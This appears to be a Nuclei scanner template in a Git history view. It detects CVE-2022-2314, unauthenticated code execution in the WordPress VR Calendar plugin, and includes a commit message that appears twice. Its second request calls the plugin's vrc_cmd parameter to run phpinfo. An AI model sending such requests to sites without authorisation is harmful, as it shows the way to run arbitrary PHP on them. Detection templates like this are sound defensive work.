nuclei-templates/http/cves/2022/CVE-2022-2314.yaml

57 lines
2.0 KiB
YAML
Raw Normal View History

2022-12-12 16:25:08 +00:00
id: CVE-2022-2314
info:
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net>
2023-03-27 17:46:47 +00:00
name: WordPress VR Calendar <=2.3.2 - Remote Code Execution
2022-12-12 16:25:08 +00:00
author: theamanrawat
severity: critical
description: |
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net>
2023-03-27 17:46:47 +00:00
WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-09-06 11:59:08 +00:00
remediation: |
Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.
2022-12-12 16:25:08 +00:00
reference:
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
- https://wordpress.org/plugins/vr-calendar-sync/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-12-12 16:25:08 +00:00
cve-id: CVE-2022-2314
2023-10-14 11:27:55 +00:00
cwe-id: CWE-78,NVD-CWE-noinfo
epss-score: 0.25245
epss-percentile: 0.962
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:*
2022-12-12 16:25:08 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: vr_calendar_project
product: vr_calendar
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project
2022-12-12 16:25:08 +00:00
http:
2022-12-12 16:25:08 +00:00
- raw:
- |
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "phpinfo"
- "PHP Version"
condition: and
- type: word
part: body_1
words:
- "vrc-calendar"
- type: status
status:
- 200
# digest: 4a0a00473045022100cd39e268af62941f7d7aca4ce717e3c43faf2d5f2224a5ac944d5675c8bd159c02201c06b2305a5e4cddfdf36cf44996563aa2883d704c20754ec3cf05ce8365d2dc:922c64590222798bb761d5b6d8e72950